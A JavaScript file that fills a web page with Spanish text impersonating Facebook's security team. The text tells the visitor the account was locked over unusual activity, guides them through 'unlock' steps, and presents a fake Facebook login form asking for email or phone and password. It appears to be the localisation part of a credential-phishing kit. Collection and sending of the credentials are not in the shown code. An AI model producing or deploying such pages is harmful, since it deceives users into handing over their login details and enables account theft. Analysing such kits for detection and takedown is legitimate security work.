var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");


mainHeader.innerHTML ="Su cuenta ha sido bloqueada";
mainParagraph.innerHTML ="Vimos actividad inusual en su cuenta. Esto puede significar que alguien ha utilizado su cuenta sin su conocimiento.";
lockedHeader.innerHTML ="Cuenta bloqueada 10 de noviembre de 2021";
lockedParagraph.innerHTML ="Para protegerte, tu perfil no es visible para las personas en Facebook y no puedes usar tu cuenta.";
footerParagraph.innerHTML ="Lo guiaremos a través de algunos pasos para desbloquear su cuenta.";
getStarted.innerHTML ="Empezar";
nextHeader.innerHTML ="Cómo desbloquear tu cuenta";
fristLineHeader.innerHTML ="Confirma que esta es tu cuenta";
fristLineParagraph.innerHTML ="Debido a que otra persona puede haber tenido acceso, debemos confirmar que usted es el propietario de esta cuenta antes de continuar.";
secoundLineHeader.innerHTML ="Asegure sus datos de inicio de sesión";
thirdLineHeader.innerHTML ="Tu cuenta será desbloqueada";
nextButton.innerHTML ="próximo";
backButton.innerHTML ="atrás";
logHeading.innerHTML ="Iniciar sesión en Facebook";
logAlert.innerHTML ="Primero debes iniciar sesión";
logAlert2.innerHTML ="Primero debes iniciar sesión";
userInput.setAttribute("placeholder" , "Dirección de correo electrónico o número de teléfono");
passInput.setAttribute("placeholder" , "Contraseña");
logButton.innerHTML ="Iniciar sesión";
or.innerHTML ="o";
createButton.innerHTML ="Crear una nueva cuenta";
